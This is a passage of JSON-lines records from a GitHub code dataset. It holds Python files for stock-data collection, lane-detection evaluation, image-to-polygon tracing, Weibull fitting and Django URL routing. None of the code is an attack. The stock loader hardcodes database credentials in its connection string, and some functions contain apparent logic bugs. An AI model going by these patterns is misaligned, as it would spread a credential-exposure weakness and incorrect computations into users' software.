+{"seq_id": "16442136805", "text": "# -*- coding: utf-8 -*-\n\nfrom sqlalchemy import create_engine\nimport tushare as ts\nimport datetime\nimport models\n\nsock_list = []\nengine = create_engine('postgresql://sock-user:sock-password@10.6.3.29:15432/sock-db')\n\ndb_session = None\n\ndef ticks_get_date(sock_list, date=''):\n # import pdb;pdb.set_trace()\n today_data = datetime.datetime.now().date().strftime(\"%Y-%m-%d\")\n if (not date) or (date == today_data):\n target_data = today_data\n func = ts.get_today_ticks\n use_date = False\n else:\n target_data = date\n func = ts.get_tick_data\n use_date = True\n for sock in sock_list:\n print('download {} ...'.format(sock))\n df = func(sock, date=target_data, src='tt') if use_date else func(sock)\n # df = df[df['time'].str.contains('09:30:[0-9]{2}')]\n df['code'] = sock\n df['date'] = target_data\n print('')\n print('download finished! save to db ...')\n table_name = 'ticks_table'\n df.to_sql(table_name, engine, if_exists='append', index=False)\n print('save finished!')\n\ndef init_sock_list():\n\n socklist = db_session.query(models.StockList).all()\n if socklist:\n print('sock list has been inited')\n return\n\n df = ts.get_today_all()\n table_name = 'stocks_list'\n del df['changepercent']\n del df['trade']\n del df['open']\n del df['high']\n del df['low']\n del df['settlement']\n del df['volume']\n del df['turnoverratio']\n del df['amount']\n del df['per']\n del df['pb']\n del df['mktcap']\n del df['nmc']\n df.to_sql(table_name, engine, if_exists='append', index=False)\n print('save finished!')\n\ndef get_all_sock_his_data(start, end, code=''):\n # 除了st的全部股票列表\n if code:\n stocklist = db_session.query(models.StockList).filter(models.StockList.name.notlike('%ST%')).filter(\n models.StockList.code == code).all()\n else:\n stocklist = db_session.query(models.StockList).filter(models.StockList.name.notlike('%ST%')).all()\n\n i = 1\n table_name = 'stock_his_data'\n # import pdb;pdb.set_trace()\n for stock in stocklist:\n df = ts.get_k_data(stock.code, start=start, end=end)\n df['name'] = stock.name\n #根据日期进行查重操作,对于数据库中已经存在的数据从df中剥离\n idx = 0\n # total_row = df.iloc[:,0].size\n while idx < df.iloc[:,0].size:\n date = df.iloc[idx]['date']\n d = db_session.query(models.StockHisData).filter(models.StockHisData.code == stock.code).filter(\n models.StockHisData.date == date).first()\n if not d:\n idx += 1\n else:\n df.drop(df.index[idx],inplace=True)\n\n df.to_sql(table_name, engine, if_exists='append', index=False)\n print('seq:{},{}({}) save to db succeed'.format(i, stock.name, stock.code))\n i += 1\n\n\n return\n\ndef update_percentage(code='',start='', end=''):\n # 除了st的全部股票列表\n if code:\n stocklist = db_session.query(models.StockList).filter(models.StockList.name.notlike('%ST%')).filter(\n models.StockList.code == code).all()\n else:\n stocklist = db_session.query(models.StockList).filter(models.StockList.id > 0).filter(\n models.StockList.name.notlike('%ST%')).all()\n\n\n i = 1\n for stock in stocklist:\n print('seq {}:try to update {}({}) percentage...'.format(i, stock.name, stock.code))\n i += 1\n if start and end:\n stock_datas = db_session.query(models.StockHisData).filter(models.StockHisData.code == stock.code).filter(\n models.StockHisData.date >= start).filter(models.StockHisData.date <= end).order_by(\n models.StockHisData.date.asc()).all()\n else:\n stock_datas = db_session.query(models.StockHisData).filter(models.StockHisData.code == stock.code).order_by(\n models.StockHisData.date.asc()).all()\n last_data = None\n for data in stock_datas:\n if not last_data:\n last_data = data\n continue\n else:\n data.percentage = round((data.close / last_data.close - 1) * 100, 2)\n last_data = data\n db_session.merge(data)\n db_session.commit()\n\n return\n\ndef update_ma5(code='',start='', end=''):\n # 除了st的全部股票列表\n if code:\n stocklist = db_session.query(models.StockList).filter(models.StockList.name.notlike('%ST%')).filter(\n models.StockList.code == code).all()\n else:\n stocklist = db_session.query(models.StockList).filter(models.StockList.id > 0).filter(\n models.StockList.name.notlike('%ST%')).all()\n\n\n i = 1\n for stock in stocklist:\n print('seq {}:try to update {}({}) ma5...'.format(i, stock.name, stock.code))\n i += 1\n if not start and not end:\n stock_datas = db_session.query(models.StockHisData).filter(models.StockHisData.code == stock.code).filter(\n models.StockHisData.date >= start).filter(models.StockHisData.date <= end).order_by(\n models.StockHisData.date.asc()).all()\n else:\n stock_datas = db_session.query(models.StockHisData).filter(models.StockHisData.code == stock.code).order_by(\n models.StockHisData.date.asc()).all()\n\n if len(stock_datas) < 5:\n continue\n\n for idx in range(4, len(stock_datas)):\n total = sum([stock_datas[idx].close, stock_datas[idx-1].close, stock_datas[idx-2].close, stock_datas[idx-3].close, stock_datas[idx-4].close])\n stock_datas[idx].ma5 = round(total/5, 2)\n db_session.merge(stock_datas[idx])\n db_session.commit()\n\n return\n\n\nif __name__ == '__main__':\n\n sock_list = ['000151']\n\n models.init_db()\n\n db_session = models.DBSession()\n\n init_sock_list()\n\n get_all_sock_his_data('2018-11-12', '2018-11-20')\n\n update_percentage(start='2018-11-12', end='2018-11-20')\n\n update_ma5(start='2018-11-06', end='2018-11-20')\n\n db_session.close()\n\n #ticks_get_date(sock_list, date='2018-03-05')\n\n # df = ts.get_today_ticks('300274')\n # # engine = create_engine('postgresql+psycopg2://sock-user:sock-password@10.6.3.29:15432/sock-db')\n #\n # #存入数据库\n # df.to_sql('tick_data',engine, if_exists='append', index_label='id')\n # df.filter()\n # import pdb;pdb.set_trace()\n\n#追加数据到现有表\n#df.to_sql('tick_data',engine,if_exists='append')", "repo_name": "shichao1986/daily_exercise", "sub_path": "stocket/datas.py", "file_name": "datas.py", "file_ext": "py", "file_size_in_byte": 6562, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 9, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "attribute"}, {"api_name": "tushare.get_today_ticks", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tushare.get_tick_data", "line_number": 22, "usage_type": "attribute"}, {"api_name": "models.StockList", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tushare.get_today_all", "line_number": 43, "usage_type": "call"}, {"api_name": "models.StockList", "line_number": 64, "usage_type": "attribute"}, {"api_name": "models.StockList.name.notlike", "line_number": 64, "usage_type": "call"}, {"api_name": "models.StockList", "line_number": 65, "usage_type": "attribute"}, {"api_name": "models.StockList", "line_number": 67, "usage_type": "attribute"}, {"api_name": "models.StockList.name.notlike", "line_number": 67, "usage_type": "call"}, {"api_name": "tushare.get_k_data", "line_number": 73, "usage_type": "call"}, {"api_name": "models.StockHisData", "line_number": 80, "usage_type": "attribute"}, {"api_name": "models.StockHisData", "line_number": 81, "usage_type": "attribute"}, {"api_name": "models.StockList", "line_number": 97, "usage_type": "attribute"}, {"api_name": "models.StockList.name.notlike", "line_number": 97, "usage_type": "call"}, {"api_name": "models.StockList", "line_number": 98, "usage_type": "attribute"}, {"api_name": "models.StockList", "line_number": 100, "usage_type": "attribute"}, {"api_name": "models.StockList.name.notlike", "line_number": 101, "usage_type": "call"}, {"api_name": "models.StockList", "line_number": 101, "usage_type": "attribute"}, {"api_name": "models.StockHisData", "line_number": 109, "usage_type": "attribute"}, {"api_name": "models.StockHisData", "line_number": 110, "usage_type": "attribute"}, {"api_name": "models.StockHisData.date.asc", "line_number": 111, "usage_type": "call"}, {"api_name": "models.StockHisData", "line_number": 111, "usage_type": "attribute"}, {"api_name": "models.StockHisData", "line_number": 113, "usage_type": "attribute"}, {"api_name": "models.StockHisData.date.asc", "line_number": 114, "usage_type": "call"}, {"api_name": "models.StockHisData", "line_number": 114, "usage_type": "attribute"}, {"api_name": "models.StockList", "line_number": 131, "usage_type": "attribute"}, {"api_name": "models.StockList.name.notlike", "line_number": 131, "usage_type": "call"}, {"api_name": "models.StockList", "line_number": 132, "usage_type": "attribute"}, {"api_name": "models.StockList", "line_number": 134, "usage_type": "attribute"}, {"api_name": "models.StockList.name.notlike", "line_number": 135, "usage_type": "call"}, {"api_name": "models.StockList", "line_number": 135, "usage_type": "attribute"}, {"api_name": "models.StockHisData", "line_number": 143, "usage_type": "attribute"}, {"api_name": "models.StockHisData", "line_number": 144, "usage_type": "attribute"}, {"api_name": "models.StockHisData.date.asc", "line_number": 145, "usage_type": "call"}, {"api_name": "models.StockHisData", "line_number": 145, "usage_type": "attribute"}, {"api_name": "models.StockHisData", "line_number": 147, "usage_type": "attribute"}, {"api_name": "models.StockHisData.date.asc", "line_number": 148, "usage_type": "call"}, {"api_name": "models.StockHisData", "line_number": 148, "usage_type": "attribute"}, {"api_name": "models.init_db", "line_number": 166, "usage_type": "call"}, {"api_name": "models.DBSession", "line_number": 168, "usage_type": "call"}]}
+{"seq_id": "29777497074", "text": "import os\nimport numpy as np\nimport datetime\nfrom PIL import Image\n\nimport torch\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom torchvision import transforms as transforms\n\nfrom datasets import culane\nimport transforms as extend_transforms\nfrom utils import check_mkdir, AverageMeter, evaluation, prob2lines\nfrom model import Baseline\nfrom torch.backends import cudnn\n\ncudnn.enable = True\nos.environ['CUDA_VISIBLE_DEVICES'] = '1'\n\nckpt_path = './ckpt'\nexp_name = 'model'\n\nargs = {\n 'checkpoint':'60000',\n 'val_size': [800, 288],\n 'save_results': True,\n 'deep_base': True,\n}\n\nmean = [0.3598, 0.3653, 0.3662]\nstd = [0.2573, 0.2663, 0.2756]\n\nimg_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n])\nmask_transform = extend_transforms.MaskToTensor()\nto_pil = transforms.ToPILImage()\nval_joint_transform = extend_transforms.Scale(args['val_size'])\n\n\ncriterion = torch.nn.CrossEntropyLoss(weight=torch.Tensor([0.4, 1, 1, 1, 1]).cuda(), size_average=True,\n ignore_index=culane.ignore_label)\ncriterion = criterion.cuda()\n\n\ndef main():\n net = Baseline(num_classes=culane.num_classes, deep_base=args['deep_base']).cuda()\n\n print('load checkpoint \\'%s.pth\\' for evaluation' % args['checkpoint'])\n pretrained_dict = torch.load(os.path.join(ckpt_path, exp_name, args['checkpoint'] + '_checkpoint.pth'))\n pretrained_dict = {k[7:]: v for k, v in pretrained_dict.items()}\n net.load_state_dict(pretrained_dict)\n\n net.eval()\n\n save_dir = os.path.join(ckpt_path, exp_name, 'vis_%s_test' % args['checkpoint'])\n check_mkdir(save_dir)\n log_path = os.path.join(save_dir, str(datetime.datetime.now()) + '.log')\n\n data_list = [l.strip('\\n') for l in open(os.path.join(culane.root, culane.list, 'test_gt.txt'), 'r')]\n\n loss_record = AverageMeter()\n gt_all, prediction_all=[], []\n\n for idx in range(len(data_list)):\n print('evaluating %d / %d' % (idx + 1, len(data_list)))\n\n img = Image.open(culane.root + data_list[idx].split(' ')[0]).convert('RGB')\n gt = Image.open(culane.root + data_list[idx].split(' ')[1])\n\n img, gt = val_joint_transform(img, gt)\n\n with torch.no_grad():\n img_var = Variable(img_transform(img).unsqueeze(0)).cuda()\n gt_var = Variable(mask_transform(gt).unsqueeze(0)).cuda()\n\n prediction = net(img_var)[0]\n\n loss = criterion(prediction, gt_var)\n loss_record.update(loss.data, 1)\n\n scoremap = F.softmax(prediction, dim=1).data.squeeze().cpu().numpy()\n\n prediction = prediction.data.max(1)[1].squeeze().cpu().numpy().astype(np.uint8)\n prediction_all.append(prediction)\n gt_all.append(np.array(gt))\n\n if args['save_results']:\n check_mkdir(save_dir + data_list[idx].split(' ')[0][:-10])\n out_file = open(os.path.join(save_dir, data_list[idx].split(' ')[0][1:-4] + '.lines.txt'), 'w')\n prob2lines(scoremap, out_file)\n\n acc, acc_cls, mean_iu, fwavacc = evaluation(prediction_all, gt_all, culane.num_classes)\n log = 'val results: loss %.5f acc %.5f acc_cls %.5f mean_iu %.5f fwavacc %.5f' % \\\n (loss_record.avg, acc, acc_cls, mean_iu, fwavacc)\n print(log)\n open(log_path, 'w').write(log + '\\n')\n\n\nif __name__ == '__main__':\n main()\n\n", "repo_name": "britney-f/SALMNet", "sub_path": "eval.py", "file_name": "eval.py", "file_ext": "py", "file_size_in_byte": 3386, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.backends.cudnn.enable", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 17, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.Compose", "line_number": 33, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 33, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 34, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 34, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 35, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 35, "usage_type": "name"}, {"api_name": "transforms.MaskToTensor", "line_number": 37, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToPILImage", "line_number": 38, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 38, "usage_type": "name"}, {"api_name": "transforms.Scale", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 42, "usage_type": "call"}, {"api_name": "datasets.culane.ignore_label", "line_number": 43, "usage_type": "attribute"}, {"api_name": "datasets.culane", "line_number": 43, "usage_type": "name"}, {"api_name": "model.Baseline", "line_number": 48, "usage_type": "call"}, {"api_name": "datasets.culane.num_classes", "line_number": 48, "usage_type": "attribute"}, {"api_name": "datasets.culane", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "utils.check_mkdir", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 59, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "datasets.culane.root", "line_number": 61, "usage_type": "attribute"}, {"api_name": "datasets.culane", "line_number": 61, "usage_type": "name"}, {"api_name": "datasets.culane.list", "line_number": 61, "usage_type": "attribute"}, {"api_name": "utils.AverageMeter", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 69, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 69, "usage_type": "name"}, {"api_name": "datasets.culane.root", "line_number": 69, "usage_type": "attribute"}, {"api_name": "datasets.culane", "line_number": 69, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 70, "usage_type": "name"}, {"api_name": "datasets.culane.root", "line_number": 70, "usage_type": "attribute"}, {"api_name": "datasets.culane", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 83, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 85, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "utils.check_mkdir", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "utils.prob2lines", "line_number": 92, "usage_type": "call"}, {"api_name": "utils.evaluation", "line_number": 94, "usage_type": "call"}, {"api_name": "datasets.culane.num_classes", "line_number": 94, "usage_type": "attribute"}, {"api_name": "datasets.culane", "line_number": 94, "usage_type": "name"}]}
+{"seq_id": "28140287755", "text": "import numpy as np\nimport potrace\nimport cv2\nimport matplotlib.pyplot as plt\n\n\nclass Polygon:\n def __init__(self, points):\n self.points = points\n self.children = ()\n\n\nclass Drawing:\n def __init__(self, polygons):\n self.polygons = polygons\n self.fillings = ()\n self.bounds = ()\n \n\n\ndef add_vertical_lines(img):\n for i in range(img.shape[1]):\n if i % 2 == 0:\n continue\n img[:, i] = 255\n return img\n\n\n# A recursive function that decomposes a curve into polygons\n# The recursion takes care of the children of the curve\ndef decompose_to_polygons(parent, curve):\n points = []\n for segment in curve:\n c = segment.c\n e = segment.end_point\n points.append(c)\n points.append(e)\n points = np.array(points)\n\n p = Polygon(points)\n parent.children += (p,)\n\n for child in curve.children:\n decompose_to_polygons(p, child)\n\n\ndef to_polygons(img, fill=False):\n img_copy = img.copy() # Don't modify the original image\n # Scale up the image so that the longest dimension is 1200 pixels and the aspect ratio is preserved\n biggest_dim = max(img_copy.shape)\n scale_factor = 1200 / biggest_dim\n img_copy = cv2.resize(img_copy, None, fx=scale_factor, fy=scale_factor, interpolation=cv2.INTER_AREA)\n if len(img.shape) == 3:\n gray = cv2.cvtColor(img_copy, cv2.COLOR_BGR2GRAY)\n else:\n gray = img_copy\n data = gray < 200 # Convert to 2D boolean array\n data = np.flipud(data) # Flip the image vertically, since Potrace's origin is in the top-left corner\n bmp = potrace.Bitmap(data)\n path = bmp.trace(\n turdsize=0,\n turnpolicy=potrace.TURNPOLICY_MINORITY,\n alphamax=0,\n opticurve=1,\n opttolerance=0\n )\n\n # For my pen plotter, I prefer to convert every curve to a list of points\n # Since I set alphamax to 0, all curves should be corners\n # Connecting the corners with straight lines will result in a polygon\n # The entire image will be a list of polygons\n # This will make it easy for the pen plotter to draw the image\n # All it needs to do is, for each polygon, move the pen to all the points in the polygon\n # Lift the pen, move to the next polygon, and repeat\n root = Polygon(())\n for curve in path.curves_tree:\n decompose_to_polygons(root, curve)\n\n if fill:\n img_with_lines = add_vertical_lines(img_copy)\n root2_children = to_polygons(img_with_lines, fill=False).children\n root.children += root2_children\n\n return root\n\n\nCOLORS = ['b', 'r'] # Colors for the borders of the polygons\nFILL_COLORS = ['w', 'k'] # Colors for the fill of the polygons\n\n\ndef draw_poly(poly, show_borders, show_filling, ax=plt, depth=0):\n\n points = poly.points\n\n # Fill the polygon\n if show_filling:\n fill_color = FILL_COLORS[depth % len(FILL_COLORS) - 1] # -1 since the first polygon doesn't count\n ax.fill(\n points[:, 0], # x-coordinates.\n points[:, 1], # y-coordinates.\n fill_color\n )\n\n for child in poly.children:\n draw_poly(child, show_borders, show_filling, ax, depth + 1)\n\n if show_borders:\n color = COLORS[depth % len(COLORS)]\n ax.plot(\n points[:, 0], # x-coordinates.\n points[:, 1], # y-coordinates.\n color + '-' # Styling (blue, solid line).\n )\n # Draw a line between the first and last points.\n ax.plot(\n [points[0, 0], points[-1, 0]], # x-coordinates of first and last points.\n [points[0, 1], points[-1, 1]], # y-coordinates of first and last points.\n color + '-' # Styling (blue, solid line).\n )\n\n\ndef draw_polygons(root, show_borders=True, show_filling=True, ax=plt):\n for polygon in root.children:\n draw_poly(polygon, show_borders, show_filling, ax, 0)\n\n # Make ax have the same ratio as the image.\n try:\n ax.set_aspect('equal', adjustable='box', anchor='C')\n except:\n ax.gca().set_aspect('equal', adjustable='box')\n\n\ndef get_bounds(root):\n # Since root contains the biggest polygons, we don't need to check the child polygons\n xmin = np.inf\n xmax = -np.inf\n ymin = np.inf\n ymax = -np.inf\n for polygon in root.children:\n xmin = min(xmin, np.min(polygon.points[:, 0]))\n xmax = max(xmax, np.max(polygon.points[:, 0]))\n ymin = min(ymin, np.min(polygon.points[:, 1]))\n ymax = max(ymax, np.max(polygon.points[:, 1]))\n\n return xmin, xmax, ymin, ymax\n\n\ndef scale_polygons(root, scale):\n for polygon in root.children:\n polygon.points *= scale\n scale_polygons(polygon, scale)\n\n\ndef translate_polygons(root, x, y):\n for polygon in root.children:\n polygon.points[:, 0] += x\n polygon.points[:, 1] += y\n translate_polygons(polygon, x, y)\n\n\ndef adjust_polygons_bounds(root, xmin, xmax, ymin, ymax):\n current_xmin, current_xmax, current_ymin, current_ymax = get_bounds(root)\n xdiff = xmax - xmin\n ydiff = ymax - ymin\n scale = min(xdiff / (current_xmax - current_xmin), ydiff / (current_ymax - current_ymin))\n scale_polygons(root, scale)\n translate_polygons(root, xmin - current_xmin, ymin - current_ymin)\n return root\n\n\nif __name__ == \"__main__\":\n IMAGE_PATH = \"../TestImages/levi_edge.png\"\n data = cv2.imread(IMAGE_PATH)\n polygons = to_polygons(data, fill=True)\n # Plot the polygons and the original image\n fig, (ax1, ax2) = plt.subplots(1, 2)\n # Plot the polygons on the left subplot\n draw_polygons(polygons, show_borders=True, show_filling=False, ax=ax1)\n ax1.grid()\n ax1.title.set_text('Polygons')\n # Plot the original image on the right subplot\n ax2.imshow(data)\n ax2.title.set_text('Original Image')\n # Show the figure\n plt.show()\n", "repo_name": "Yonni123/PenPlotter", "sub_path": "Python/RasterToVector.py", "file_name": "RasterToVector.py", "file_ext": "py", "file_size_in_byte": 5856, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 52, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.flipud", "line_number": 58, "usage_type": "call"}, {"api_name": "potrace.Bitmap", "line_number": 59, "usage_type": "call"}, {"api_name": "potrace.TURNPOLICY_MINORITY", "line_number": 62, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 135, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 136, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 137, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 138, "usage_type": "attribute"}, {"api_name": "numpy.min", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 143, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}]}
+{"seq_id": "23403961611", "text": "#!/usr/bin/env python2\n# Ensures you use only the python2.X on your machine\n# Author: Mohammadali Ghasemi\n\nimport numpy as np\nfrom scipy.integrate import odeint\nimport matplotlib.pyplot as plt\nimport time\nstart_time = time.time()\n\narr = np.genfromtxt('myspace.csv', delimiter=\",\")[:, 1]\n\nh = arr[arr > 0]\nN = int(np.sum(h))\nx = np.arange(1, len(h) + 1, dtype='float')\n\n\ndef getDerivation(h, x, N, kappa, alpha):\n L_k = N / kappa - N * np.log(alpha) + np.sum(h * np.log(x)) - np.sum(h * (x / alpha) ** kappa * np.log(x / alpha))\n L_a = kappa / alpha * (np.sum(h * (x / alpha) ** kappa) - N)\n\n return np.asscalar(L_a), np.asscalar(L_k)\n\n\ndef derivativeCalculator(y, t0, h, x, N):\n kappa, alpha = y\n return getDerivation(h, x, N, alpha, kappa)\n\n\nplt.plot(x, h / N)\nt = np.linspace(0, 10, 30)\ny = odeint(derivativeCalculator, (1., 1.), t, args=(h, x, N), mxstep=5000000)\nres_alpha, res_kappa = y[-1, :]\n\n\ndef weib(x, k, a):\n return (k / a) * (x / a) ** (k - 1) * np.exp(-(x / a) ** k)\n\nprint(\"K: \",res_kappa,\" Alpha: \",res_alpha)\n\nplt.plot(x, weib(x, res_kappa, res_alpha))\nplt.show()", "repo_name": "imghasemi/Pattern-Recognition", "sub_path": "Project 1/Task 1.3/task1.3_ode_ali.py", "file_name": "task1.3_ode_ali.py", "file_ext": "py", "file_size_in_byte": 1098, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.asscalar", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 31, "usage_type": "call"}, {"api_name": "scipy.integrate.odeint", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}]}
+{"seq_id": "7246759102", "text": "\"\"\"\nDefinition of urls for TextNLPVisualiser.\n\"\"\"\n\nfrom datetime import datetime\nfrom django.conf.urls import url, include\nfrom django.urls import path\nfrom django.contrib import admin\nfrom django.contrib.auth.views import LoginView, LogoutView\nfrom app import forms, views\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n path('', views.home, name='home'),\n path('contact/', views.contact, name='contact'),\n path('about/', views.about, name='about'),\n path('login/',\n LoginView.as_view\n (\n template_name='app/login.html',\n authentication_form=forms.BootstrapAuthenticationForm,\n extra_context=\n {\n 'title': 'Log in',\n 'year' : datetime.now().year,\n }\n ),\n name='login'),\n path('logout/', LogoutView.as_view(next_page='/'), name='logout'),\n path('admin/', admin.site.urls),\n path('segmentation/', views.segmentation, name='segmentation' ),\n path('tokenization/', views.tokenization, name='tokenization' ),\n path('tagger/', views.tagger, name='tagger' ),\n path('chunk/', views.chunk, name='chunk' ),\n path('application/', views.application, name='application' ),\n path('application/process', views.process, name='process' ),\n]\n", "repo_name": "mokrdd/TextVisualiser", "sub_path": "TextNLPVisualiser/TextNLPVisualiser/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1343, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 11, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "app.views.home", "line_number": 15, "usage_type": "attribute"}, {"api_name": "app.views", "line_number": 15, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "app.views.contact", "line_number": 16, "usage_type": "attribute"}, {"api_name": "app.views", "line_number": 16, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "app.views.about", "line_number": 17, "usage_type": "attribute"}, {"api_name": "app.views", "line_number": 17, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LoginView.as_view", "line_number": 19, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LoginView", "line_number": 19, "usage_type": "name"}, {"api_name": "app.forms.BootstrapAuthenticationForm", "line_number": 22, "usage_type": "attribute"}, {"api_name": "app.forms", "line_number": 22, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 26, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 30, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView.as_view", "line_number": 30, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView", "line_number": 30, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 31, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "app.views.segmentation", "line_number": 32, "usage_type": "attribute"}, {"api_name": "app.views", "line_number": 32, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "app.views.tokenization", "line_number": 33, "usage_type": "attribute"}, {"api_name": "app.views", "line_number": 33, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "app.views.tagger", "line_number": 34, "usage_type": "attribute"}, {"api_name": "app.views", "line_number": 34, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 35, 